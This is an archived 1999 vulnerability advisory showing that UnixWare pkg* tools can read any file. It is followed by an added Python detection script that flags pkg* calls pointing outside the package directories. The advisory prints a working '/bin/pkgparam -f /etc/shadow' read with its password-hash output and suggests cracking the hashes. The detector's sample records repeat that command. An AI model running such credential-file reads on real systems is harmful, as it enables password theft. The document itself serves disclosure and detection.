
unixware.pkg.txt
Posted Dec 6, 1999
Authored by Brock Tellier

The majority of the UnixWare "pkg" commands, such as pkginfo, pkgcat, pkgparam, etc., are vulnerable to a bug which will allow any user to read any file on the system as a result of their additional "dacread" permission in the privs file.

tags | exploit
systems | unixware
SHA-256 | eed02a6b7a86a7d3af4ec8b75523b340d16c847a4c9f0c75df048402aa31a77e

Greetings,

OVERVIEW
Any user may read any file on the system.

BACKGROUND
Only UnixWare 7.1 has been tested.

DETAILS
As previously stated, UnixWare binaries gain additional privileges via
standard suid/sgid AND /etc/security/tcb/privs. The majority of the UnixWare
"pkg" commands, such as pkginfo, pkgcat, pkgparam, etc., are vulnerable to
a bug which will allow any user to read any file on the system as a result
of their additional "dacread" permission in the privs file.

The dacread permission allows a process to override the Discretionary Access
Controls (DAC) for read-only operations. Basically, a process with the
dacread permissions is able to bypass the mode bits and ownership on a file,
but only for reading it. A process with dacwrite permissions can bypass mode
bits to write to or execute that file.

I'm pretty sure that the bugs I found in the pkg commands were introduced by
their addition to the privs file. As far as I can tell, there is virtually no
reason for them to be able to read any file on the system.


All around, this additional privilege thing, well, sucks. Consider now that
the truss(1) command will allow the user to see any file i/o that happens
between a process and the system since it isn't suid/sgid. Thus, if there is
*any* way that you can make pkg* read from a file, even if the output is never
printed, you can examine truss output to get the file's contents.

EXPLOIT
The worst offender of pkg* is pkgparam, which will print the contents of a
file to stdout, though I've been able to get most of the pkg program to read
from /etc/shadow in one way or another and grab the contents with truss.

bash-2.02$ ls -la /bin/pkgparam
-r-xr-xr-x 1 root sys 166784 May 21 1999 /bin/pkgparam
bash-2.02$ /bin/pkgparam -f /etc/shadow
Dy0l3OC7XHsj.:10925::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
NP:6445::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
BgusHRQZ9MH2U:10878::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
*LK*:::::::
nv.Xrh2V3vArc:10882::::::
ozT.yeRe1/dxY:10882::::::
RinwpQfqabYbc:10928::::::
bash-2.02$

Now just concatenate the first field of /etc/passwd with this file and run
your favorite cracker.

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net
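
Added detection example (not part of the original advisory): a scan of command-execution records that flags pkg* invocations whose file arguments, such as the `-f /etc/shadow` shown above, resolve outside the package directories. The record layout, the allowed directories, the sample records and the function names are assumptions made for illustration.

```python
import posixpath
import re
import shlex

# Tools the advisory names as holding the extra "dacread" privilege.
PKG_TOOLS = {"pkgparam", "pkginfo", "pkgcat"}
# Assumption: legitimate file arguments resolve under the package directories.
ALLOWED_ROOTS = ("/var/sadm/pkg", "/var/spool/pkg")
# Constructed record layout; adapt the pattern to your own exec logging.
RECORD = re.compile(r"uid=(?P<uid>\d+) cwd=(?P<cwd>\S+) cmd=(?P<cmd>.+)")


def outside_paths(cmdline, cwd="/"):
    """Return file arguments of a pkg* call that resolve outside ALLOWED_ROOTS."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        argv = cmdline.split()  # unbalanced quotes: still inspect the tokens
    if not argv or posixpath.basename(argv[0]) not in PKG_TOOLS:
        return []
    hits = []
    for prev, arg in zip(argv, argv[1:]):
        if arg.startswith("-f") and len(arg) > 2:
            arg = arg[2:]  # joined form, e.g. -f/etc/shadow
        elif arg.startswith("-") or (prev != "-f" and "/" not in arg):
            continue  # an option, a package name or a parameter name
        # Lexical normalisation only: catches ../ tricks, not symlinks.
        resolved = posixpath.normpath(posixpath.join(cwd, arg))
        if not any(resolved == r or resolved.startswith(r + "/") for r in ALLOWED_ROOTS):
            hits.append(resolved)
    return hits


def scan(lines):
    """Return (uid, resolved_path) for every record that should be reviewed."""
    return [(int(m["uid"]), path)
            for m in map(RECORD.search, lines) if m
            for path in outside_paths(m["cmd"], m["cwd"])]


SAMPLE = [  # constructed records, not real log data
    "uid=0 cwd=/ cmd=/usr/bin/pkgparam -f /var/sadm/pkg/base/pkginfo",
    "uid=1001 cwd=/home/bt cmd=/bin/pkgparam -f /etc/shadow",
    "uid=1001 cwd=/etc cmd=pkgparam -f shadow",
    "uid=1002 cwd=/tmp cmd=pkgparam -f /var/sadm/pkg/../../../etc/shadow",
    "uid=1003 cwd=/tmp cmd=pkginfo -l base",
    "uid=1003 cwd=/tmp cmd=cat /etc/motd",
]

if __name__ == "__main__":
    for uid, path in scan(SAMPLE):
        print(f"review: uid {uid} pointed a pkg tool at {path}")
```

Because the advisory notes that a file only has to be read, not printed, for truss to expose it, the check looks at what the tool was asked to open rather than at its output.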

